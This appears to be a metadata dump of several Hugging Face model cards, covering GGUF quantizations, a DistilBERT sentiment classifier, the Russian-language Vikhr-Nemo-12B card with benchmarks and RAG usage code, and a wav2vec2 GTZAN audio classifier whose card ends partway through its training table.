llama-server --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo aimlresearch2023/llama-3.3-1b-it-merged-Q6_K-GGUF --hf-file llama-3.3-1b-it-merged-q6_k.gguf -c 2048
```
|
abhinav-2k23/Llama-3-8B-AWQ-4bit_v4 | abhinav-2k23 | 2024-10-10T08:49:51Z | 76 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"en",
"base_model:meta-llama/Meta-Llama-3-8B-Instruct",
"base_model:quantized:meta-llama/Meta-Llama-3-8B-Instruct",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-07-24T16:11:27Z | ---
language:
- en
base_model:
- meta-llama/Meta-Llama-3-8B-Instruct
--- |
ashtaaav/movie-review-sentiment | ashtaaav | 2024-10-10T08:37:38Z | 105 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T08:17:01Z | ---
base_model: distilbert-base-uncased
library_name: transformers
license: apache-2.0
metrics:
- accuracy
tags:
- generated_from_trainer
model-index:
- name: movie-review-sentiment
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# movie-review-sentiment
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7205
- Accuracy: 0.9036
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 0.1879 | 1.0 | 500 | 0.5573 | 0.8916 |
| 0.1079 | 2.0 | 1000 | 0.5758 | 0.8964 |
| 0.0351 | 3.0 | 1500 | 0.6399 | 0.8948 |
| 0.0133 | 4.0 | 2000 | 0.6725 | 0.9084 |
| 0.0024 | 5.0 | 2500 | 0.7205 | 0.9036 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
old6ix/good-start | old6ix | 2024-10-10T08:32:31Z | 162 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-09T03:14:46Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf | RichardErkhov | 2024-10-10T08:24:19Z | 9 | 0 | null | [
"gguf",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T04:57:09Z | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
Seagull-llama-3-8B-orpo-v0.4 - GGUF
- Model creator: https://huggingface.co/jsk0214/
- Original model: https://huggingface.co/jsk0214/Seagull-llama-3-8B-orpo-v0.4/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [Seagull-llama-3-8B-orpo-v0.4.Q2_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q2_K.gguf) | Q2_K | 2.96GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ3_XS.gguf) | IQ3_XS | 3.28GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ3_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ3_S.gguf) | IQ3_S | 3.43GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K_S.gguf) | Q3_K_S | 3.41GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ3_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ3_M.gguf) | IQ3_M | 3.52GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K.gguf) | Q3_K | 3.74GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K_M.gguf) | Q3_K_M | 3.74GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q3_K_L.gguf) | Q3_K_L | 4.03GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ4_XS.gguf) | IQ4_XS | 4.18GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_0.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_0.gguf) | Q4_0 | 4.34GB |
| [Seagull-llama-3-8B-orpo-v0.4.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.IQ4_NL.gguf) | IQ4_NL | 4.38GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_K_S.gguf) | Q4_K_S | 4.37GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_K.gguf) | Q4_K | 4.58GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_K_M.gguf) | Q4_K_M | 4.58GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q4_1.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q4_1.gguf) | Q4_1 | 4.78GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_0.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_0.gguf) | Q5_0 | 5.21GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_K_S.gguf) | Q5_K_S | 5.21GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_K.gguf) | Q5_K | 5.34GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_K_M.gguf) | Q5_K_M | 5.34GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q5_1.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q5_1.gguf) | Q5_1 | 5.65GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q6_K.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q6_K.gguf) | Q6_K | 6.14GB |
| [Seagull-llama-3-8B-orpo-v0.4.Q8_0.gguf](https://huggingface.co/RichardErkhov/jsk0214_-_Seagull-llama-3-8B-orpo-v0.4-gguf/blob/main/Seagull-llama-3-8B-orpo-v0.4.Q8_0.gguf) | Q8_0 | 7.95GB |
Original model description:
---
language:
- en
license: other
license_name: llama3
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
- orpo
base_model: kuotient/Meta-Llama-3-8B
---
# Uploaded model
- **Developed by:** kuotient
- **License:** apache-2.0
- **Finetuned from model :** kuotient/Meta-Llama-3-8B
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
travelgate/testy_testy_room_environment-classifier | travelgate | 2024-10-10T08:21:35Z | 6 | 0 | null | [
"safetensors",
"distilbert",
"room",
"text-classification",
"multi-label",
"fine-tuned",
"en",
"base_model:dccuchile/distilbert-base-spanish-uncased",
"base_model:finetune:dccuchile/distilbert-base-spanish-uncased",
"region:us"
] | text-classification | 2024-10-09T14:17:33Z | ---
base_model: dccuchile/distilbert-base-spanish-uncased
language: en
model_name: environment classification
tags:
- room
- text-classification
- multi-label
- fine-tuned
---
# Evaluation Results
- F1 Score (Macro): 0.8889
- F1 Score (Micro): 0.9000
- Hamming Loss: 0.1818
- Accuracy: 0.6364
- Training Epochs: 1 |
mav23/Vikhr-Nemo-12B-Instruct-R-21-09-24-GGUF | mav23 | 2024-10-10T08:20:37Z | 99 | 4 | transformers | [
"transformers",
"gguf",
"en",
"ru",
"dataset:Vikhrmodels/GrandMaster-PRO-MAX",
"dataset:Vikhrmodels/Grounded-RAG-RU-v2",
"base_model:mistralai/Mistral-Nemo-Instruct-2407",
"base_model:quantized:mistralai/Mistral-Nemo-Instruct-2407",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2024-10-10T06:56:24Z | ---
license: apache-2.0
datasets:
- Vikhrmodels/GrandMaster-PRO-MAX
- Vikhrmodels/Grounded-RAG-RU-v2
language:
- en
- ru
base_model:
- mistralai/Mistral-Nemo-Instruct-2407
library_name: transformers
---
[Reame.md in English](Readme_en.md)
## Vikhr-Nemo-12B-Instruct-R-21-09-24
### Описание
**Vikhr-Nemo** - это наша флагманская унимодальная LLM (Large Language Model) представляющая из себя улучшенную версию [mistralai/Mistral-Nemo-Instruct-2407](https://huggingface.co/mistralai/Mistral-Nemo-Instruct-2407) командой **VikhrModels**, адаптированную преимущественно для русского и английского языков. Для ее обучения мы использовали несколько этапов включающих в себя **SFT** и **SMPO** - нашу собственную вариацию DPO, подробнее читайте в секции *"Как эта модель создавалась"*.
Модель оптимизированна для различных вариантов использования, включая ризонинг, суммаризацию, код, roleplay, поддержание диалога. Vikhr-Nemo обладает возможностью многоязычной генерации, и высокопроизводительными возможностями RAG. Модель иммет лучшие оценки среди прочих на наших инструктивных и RAG бенчарках и, поэтому, мы верим, что в некоторых задачах (например, RAG) может быть не хуже gpt-4o-mini от OpenAI.
Весь использованный код для обучения доступен в нашем репозитории [effective_llm_alignment](https://github.com/VikhrModels/effective_llm_alignment/) на GitHub, а основные датасеты доступны в нашем [профиле на HF](https://huggingface.co/Vikhrmodels).
### Особенности
1. Высокое качество генераций на русском и английском языках, а также некоторых других языках, благодаря датасету [Grandmaster-PRO-MAX](https://huggingface.co/datasets/Vikhrmodels/GrandMaster-PRO-MAX) и исходной модели
2. Поддержка системных промптов для регулриования стиля ответов
3. Поддержка до 128k токенов контекста благодаря исходной модели
4. Grounded RAG режим - модель имеет специальную роль documents и специальный режим работы для поиска идентификаторов релевантных вопросу пользователя документов и использования их для ответа на вопрос, вдохновлено аналогичной способностью модели Command-R
### Метрики и оценка качества
Модель оценивалась на нашем русскоязычном open-source SbS бенчмарке [ru-arena-general](https://github.com/VikhrModels/ru_llm_arena) (50 топиков по 10 вопросов), где судьей выступает gpt-4-1106-preview и [бенчмарке](https://colab.research.google.com/drive/16730rWQ4-yGqWoooLs0Ece_16frmOniP?usp=sharing) для RAG на основе тестового сета [Grounded-RAG-v2](https://huggingface.co/datasets/Vikhrmodels/Grounded-RAG-RU-v2), где судей выступа gpt-4o.
#### Результаты на Ru-Arena-General
В качестве референсых ответов, с которыми сравниваются модели выступают ответы от gpt-3.5-turbo-0125, поэтому она имеет винрейт 50%.
Здесь приведена лишь часть лидерборда, подробнее смотрите в репозитории бенчмарка.
| Model Name | Winrate | 95% CI | Average # Tokens |
|--------------------------------------------------|--------|--------------------|------------------|
| gpt-4-1106-preview | 90.9 | (-1.3, 1.0) | 541 |
| gpt-4o-mini | 83.9 | (-1.8, 1.1) | 448 |
| **vikhr-nemo-12b-instruct-r-21-09-24** | **79.8** | (-2.2, 1.9) | **627** |
| gemma-2-9b-it-sppo-iter3 | 73.6 | (-1.6, 2.2) | 509 |
| gemma-2-9b-it | 69.2 | (-2.5, 1.9) | 459 |
| t-lite-instruct-0.1 | 64.7 | (-2.1, 1.7) | 810 |
| vikhr-llama3.1-8b-instruct-r-21-09-24 | 63.4 | (-2.1, 2.5) | 618 |
| suzume-llama-3-8B-multilingual-orpo-borda-half | 57.1 | (-1.9, 2.2) | 682 |
| mistral-nemo-instruct-2407 | 50.5 | (-2.7, 2.6) | 403 |
| gpt-3.5-turbo-0125 | 50.0 | (0.0, 0.0) | 220 |
| c4ai-command-r-v01 | 49.0 | (-1.7, 2.2) | 529 |
| meta-llama-3.1-8b-instruct | 43.1 | (-2.8, 2.3) | 628 |
#### Результаты на бенчмарке RAG
Общий размер тестового сета - 200 примеров, 100 для in_domain вопросов и 100 для out_of_domain.
Тут для оценки качества модель-судья gpt-4o была проинструктирована учитывать релеватность и фактологичкскую полноту ответов исходя из документов и реферсного ответа от gpt-4-1106-preview.
Подробности промптов и оценок смотрите в коде бенчмарка на [коллабе](https://colab.research.google.com/drive/16730rWQ4-yGqWoooLs0Ece_16frmOniP?usp=sharing)
in_domain - вопросы которые связаны с содержанием предоставленных документов в той или иной степени \
out_of_domain - вопросы которые специально никак не связаны с содержанием предоставленных документов
<table>
<thead>
<tr>
<th rowspan="2">question_type</th>
<th colspan="3">gpt-4o</th>
</tr>
<tr>
<th>judge_correct_percent</th>
<th>avg_answer_match_rougeL</th>
<th>avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>73%</td>
<td>0.34</td>
<td>NaN</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>81%</td>
<td>0.20</td>
<td>NaN</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th style="visibility: hidden;" rowspan="2">question_type</th>
<th colspan="3">Vikhr-Nemo-12B-Instruct-R-21-09-24</th>
</tr>
<tr>
<th style="visibility: hidden;">judge_correct_percent</th>
<th style="visibility: hidden;">avg_answer_match_rougeL</th>
<th style="visibility: hidden;">avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>68%</td>
<td>0.41</td>
<td>0</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>92%</td>
<td>0.52</td>
<td>0</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th style="visibility: hidden;" rowspan="2">question_type</th>
<th colspan="3">gpt-4o-mini</th>
</tr>
<tr>
<th style="visibility: hidden;">judge_correct_percent</th>
<th style="visibility: hidden;">avg_answer_match_rougeL</th>
<th style="visibility: hidden;">avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>65%</td>
<td>0.33</td>
<td>NaN</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>73%</td>
<td>0.18</td>
<td>NaN</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th style="visibility: hidden;" rowspan="2">question_type</th>
<th colspan="3">gpt-3.5-turbo-0125 </th>
</tr>
<tr>
<th style="visibility: hidden;">judge_correct_percent</th>
<th style="visibility: hidden;">avg_answer_match_rougeL</th>
<th style="visibility: hidden;">avg_abs_indexes_diff</th>
</tr>
</thead>
<tbody>
<tr>
<td>in_domain</td>
<td>49%</td>
<td>0.28</td>
<td>NaN</td>
</tr>
<tr>
<td>out_of_domain</td>
<td>76%</td>
<td>0.20</td>
<td>NaN</td>
</tr>
</tbody>
</table>
### Как эта модель создавалась
#### Инструктивная SFT часть
Для SFT этапа обучения модели мы подготовили большой (150к инструкций) инструктивный синтетический датасет [Vikhrmodels/GrandMaster-PRO-MAX](https://huggingface.co/datasets/Vikhrmodels/GrandMaster-PRO-MAX). Его особенностью является встроеный CoT (Chain-Of-Thought), для сбора которого мы использовали модифицированный промет для gpt-4-turbo, подробности в карточке датасета.
Кроме того, для того чтобы сделать RAG Grounding, мы подготовили другой синтетический датасет - [Vikhrmodels/Grounded-RAG-RU-v2](https://huggingface.co/datasets/Vikhrmodels/Grounded-RAG-RU-v2) (50k диалогов), его пайплайн сборки достаточно сложный для короткого описания и полробнее об этом вы можете прочитать в его карточке.
#### Этап алайнмента с SMPO
Для дальнейшего улучшения качества ответов мы использовали следущий пайплайн:
1) Обучили кастомную Reward модель (она пока не будет выкладываться в открытый доступ)
2) Дедуплицировали и отфилтровали используя RM модель оригинальный датасет Vikhrmodels/GrandMaster-PRO-MAX, получив порядка 10к самых высококачественных и разнообразных диалогов.
3) Сделали Rejection Sampling с SFT чекпоинтом используя полученный датасет и Reward модель. (Генерировали 7 гипотез и брали только 2 самые худшие как rejected)
4) Дообучили SFT чекпоинт с помощью нашего метода SMPO используя полученный датасет из этапа 3. SMPO был спроектирован и выбран как метод для повышения стабильности тренировки преференсов в условиях Rejection Sampling и достижения нужного margin.
Реализацию SMPO, rejection sampling и тд можно найти в нашей библиотеке [effective_llm_alignment](https://github.com/VikhrModels/effective_llm_alignment/) на GitHub
Идея использования именно SMPO, а не другого PO метода, возникла в результате проведения большого количества экспериментов с классическими методами, при необходимости лучшего контроля процесса сходимости. При тщательной настройке других методов (например SimPO), можно добится похожего результата, однако мы постарались стаблизировать этот процесс и объединить лучшие практики из других методов.
### Как работать с RAG
Роль documents представляет из себя список словарей с описанием контента документов, с примнением `json.dumps(array, ensure_ascii=False)` (см. пример ниже). \
Контент документов может быть представлен в **3** различных форматах: **Markdown**, **HTML**, **Plain Text**. Контент каждого документа - может быть чанком текста длиной до 4к символов.
```json
[
{
"doc_id": (0..5),
"title": "(null or str)",
"content": "(html or markdown or plain text)"
}
]
```
#### Пример правильного использования с OpenAI-like API
Запуск vLLM сервера: `vllm serve --dtype half --max-model-len 32000 -tp 1 Vikhrmodels/Vikhr-Nemo-12B-Instruct-R-21-09-24 --api-key token-abc123`
```python
GROUNDED_SYSTEM_PROMPT = "Your task is to answer the user's questions using only the information from the provided documents. Give two answers to each question: one with a list of relevant document identifiers and the second with the answer to the question itself, using documents with these identifiers."
documents = [
{
"doc_id": 0,
"title": "Глобальное потепление: ледники",
"content": "За последние 50 лет объем ледников в мире уменьшился на 30%"
},
{
"doc_id": 1,
"title": "Глобальное потепление: Уровень моря",
"content": "Уровень мирового океана повысился на 20 см с 1880 года и продолжает расти на 3,3 мм в год"
}
]
sample_history = [
{'role': 'system', 'content': GROUNDED_SYSTEM_PROMPT},
{'role': 'documents', 'content': json.dumps(documents, ensure_ascii=False)},
{'role': 'user', 'content': 'Глоабльное потепление'}
]
relevant_indexes = llm_client.chat.completions.create(
model=llm_model,
messages=sample_history,
temperature=0.0,
max_tokens=2048
).choices[0].message.content
print('Using documents: ' + relevant_indexes + '\n----')
final_answer = llm_client.chat.completions.create(
model=llm_model,
messages=sample_history + [{'role': 'assistant', 'content': relevant_indexes}],
temperature=0.3,
max_tokens=2048
).choices[0].message.content
print(final_answer)
```
Ответ после выполнения кода будет выглядеть примерно так:
Using documents: {"relevant_doc_ids": [0, 1]}
----
Глобальное потепление – это долгосрочное повышение средней температуры атмосферы и океанов Земли. Это явление имеет множество последствий для нашей планеты, и среди них можно выделить два ключевых аспекта, основанных на доступных мне данных:
1. **Уменьшение объема ледников**: За последние 50 лет наблюдается значительное сокращение объема ледников по всему миру. Согласно данным, объем ледников уменьшился на 30%. Это может быть связано с таянием ледников из-за повышения температур, что является одним из признаков глобального потепления.
2. **Повышение уровня моря**: Уровень мирового океана также увеличивается, что связано с таянием ледников и ледяных покровов, а также с расширением воды при повышении температуры. С 1880 года уровень моря повысился на 20 сантиметров, и этот процесс продолжается, с ежегодным увеличением на 3,3 миллиметра.
Эти изменения имеют серьезные последствия для экосистем, климата и человеческого общества. Таяние ледников приводит к повышению уровня моря, что может привести к затоплению прибрежных территорий и островов, а также к изменению водных ресурсов и климатических паттернов.
Используя первый ответ модели `relevant_indexes` (JSON), можно понять нашла ли модель информацию в документах или нет, она обучена возврашать пустой массив если ее нет и в таком случае она будет отвечать, что не смогла найти информацию в базе знаний (при генерации второго ответа).
### Нюансы и ограничения
- Модель имеет **низкий уровень безопасности ответов** и нацелена на правильное и полное выполенние инструкций, имейте это ввиду при использовании и тестируйте самостоятельно. Частично это исправляется системными промптами и дополнительными указаниями о важности безопасности в промпте пользователя.
- Системные промпты не предназначены для описание персонажей, мы рекомендуем использовать их для спецификации стиля ответа (вроде "answer only in json format"). Кроме того, желательно, писать их **на английском языке**, так как так было в датасете, от использования английского в системных промтпах не зависит язык ответа.
- RAG режим **требует обязательного** наличия системного промпта `GROUNDED_SYSTEM_PROMPT` описаного в секции *Как работать с RAG*. Так же иногда модель может добавлять общую информацию из своих знаний в ответ к той, что есть в документах.
- Модель лучше использовать с низкой темптературой (0.1-0.5), а таже использовать top_k (30-50), при температуре 1.0 были замечены случайные дефекты генерации.
### Авторы
- Sergei Bratchikov, [NLP Wanderer](https://t.me/nlpwanderer), Vikhr Team
- Konstantin Korolev, Vikhr Team
- Aleksandr Nikolich, Vikhr Team |
abdelnour131/wav2vec2-base-one-shot-hip-hop-drums-clf-finetuned-gtzan | abdelnour131 | 2024-10-10T08:15:52Z | 164 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"wav2vec2",
"audio-classification",
"generated_from_trainer",
"dataset:marsyas/gtzan",
"base_model:yojul/wav2vec2-base-one-shot-hip-hop-drums-clf",
"base_model:finetune:yojul/wav2vec2-base-one-shot-hip-hop-drums-clf",
"license:apache-2.0",
"model-index",
"endpoints_compatible",
"region:us"
] | audio-classification | 2024-10-09T17:37:45Z | ---
library_name: transformers
license: apache-2.0
base_model: yojul/wav2vec2-base-one-shot-hip-hop-drums-clf
tags:
- generated_from_trainer
datasets:
- marsyas/gtzan
metrics:
- accuracy
model-index:
- name: wav2vec2-base-one-shot-hip-hop-drums-clf-finetuned-gtzan
results:
- task:
name: Audio Classification
type: audio-classification
dataset:
name: GTZAN
type: marsyas/gtzan
config: all
split: train
args: all
metrics:
- name: Accuracy
type: accuracy
value: 0.74
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# wav2vec2-base-one-shot-hip-hop-drums-clf-finetuned-gtzan
This model is a fine-tuned version of [yojul/wav2vec2-base-one-shot-hip-hop-drums-clf](https://huggingface.co/yojul/wav2vec2-base-one-shot-hip-hop-drums-clf) on the GTZAN dataset.
It achieves the following results on the evaluation set:
- Loss: 0.9288
- Accuracy: 0.74
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 8
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 5
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 1.7695 | 1.0 | 100 | 1.9632 | 0.345 |
